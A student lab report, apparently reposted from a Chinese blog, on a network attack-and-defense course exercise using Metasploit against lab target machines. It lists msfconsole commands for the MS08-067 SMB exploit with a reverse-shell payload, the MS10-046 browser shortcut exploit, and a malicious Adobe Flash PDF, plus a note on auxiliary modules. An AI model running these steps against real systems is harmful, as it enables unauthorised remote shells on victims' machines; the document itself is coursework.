20192407 2021-2022-2 《网络与系统攻防技术》实验六实验报告

时间:2022-05-14
本文章向大家介绍20192407 2021-2022-2 《网络与系统攻防技术》实验六实验报告,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

1.实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

2.实验过程

1.1一个主动攻击实践,尽量使用最新的类似漏洞;
启动msf,使用search ms08-067指令搜索漏洞

使用use exploit/windows/smb/ms08_067_netapi指令选择相应的模块
使用show payloads,set payload generic/shell_reverse_tc指令p获取靶机shell

配置rhost,lhost,lport并进行exploit监听

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
使用search ms10_046指令查找漏洞,并使用use use exploit/windows/browser/ms10_046_shortcut_icon_指令

做好相应的配置

开始监听

在靶机上打开对应的网址

使用session -i 1指令获取连接

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
使用search adobe指令进行搜素

使用use windows/fileformat/adobe_flashplayer_button指令并进行相应的配置。

将生成的pdf文件放入靶机,主机监听的同时在靶机上运行该pdf文件


1.4 成功应用任何一个辅助模块。
使用show auxiliary指令,显示所有的辅助模块

使用webdav:

3.问题及解决方案

  • 问题1:监听浏览器经常失败
  • 问题1解决方案:换了adobereader的版本

4.学习感悟、思考等

本次实验较为简单,主要是在操作msfconsole的功能,但实际操作中仍然出现不少问题,但这些问题也让我对于监听的过程和功能有了更进一步的了解,也对与自身的粗心(输错代码等问题)有了认识并加以改正。

原文地址:https://www.cnblogs.com/xingjiyuan/p/16269703.html